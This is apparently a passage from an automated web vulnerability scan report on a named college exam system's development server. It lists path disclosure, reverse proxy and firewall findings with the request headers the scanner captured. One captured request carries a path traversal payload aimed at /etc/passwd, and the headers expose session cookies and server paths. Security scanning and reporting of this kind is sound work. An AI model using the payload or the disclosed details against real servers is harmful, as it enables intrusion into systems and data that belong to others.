Referer: http://dev-ubk.polindra.ac.id/dashboard
Accept-Encoding: gzip,deflate,br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Possible server path disclosure (Unix)

Severity Informational
Reported by module /httpdata/text_search.js

Description

One or more fully qualified path names were found. From this information, an attacker may learn the file system structure of the web server, which can be used to conduct further attacks.

This alert may be a false positive; manual confirmation is required.

Impact

Possible sensitive information disclosure.

Recommendation

Prevent this information from being displayed to the user.

References

Full Path Disclosure (https://www.owasp.org/index.php/Full_Path_Disclosure)

Affected items

Web Server
Details

Pages with paths being disclosed:

http://dev-ubk.polindra.ac.id/auth
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/ujian/master
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/import
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview/soal
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/users/edit/
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/ujian/add
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview/
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/save
/www/wwwroot/dev

Request headers
GET /auth HTTP/1.1
Host: dev-ubk.polindra.ac.id
Pragma: no-cache
Cache-Control: no-cache
upgrade-insecure-requests: 1
accept-language: en-US
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5
Accept-Encoding: gzip,deflate,br
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36

Reverse proxy detected

Severity Informational
Reported by module /target/RevProxy_Detection.js

Description

This server uses a reverse proxy, a load balancer or a CDN (Content Delivery Network) or it's hosted in a cloud provider.
Acunetix detected this by sending various payloads and detecting changes in headers and body.

Impact

No impact is associated with this vulnerability.

Recommendation

None

Affected items

Web Server
Details
Detected reverse proxy: Apache httpd
Request headers
GET /dashboard HTTP/1.1
Max-Forwards: 0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

Web Application Firewall detected

Severity Informational
Reported by module /Scripts/PerServer/WAF_Detection.script

Description

This server is protected by an IPS (Intrusion Prevention System), IDS (Intrusion Detection System) or a WAF (Web Application Firewall). Acunetix detected this by sending various malicious payloads and detecting changes in the response code, headers and body.

Impact

You may receive incorrect/incomplete results when scanning a server protected by an IPS/IDS/WAF. Also, if the WAF
detects a number of attacks coming from the scanner, the IP address can be blocked after a few attempts.

Recommendation

If possible, it's recommended to scan an internal (development) version of the web application where the WAF is not active.

Affected items

Web Server
Details
Detected WatchGuard from the response body.
Request headers
GET /dashboard?page=../../../../../../../../../etc/passwd%00.jpg HTTP/1.1
Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2; ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: dev-ubk.polindra.ac.id
Connection: Keep-alive

Scanned items (coverage report)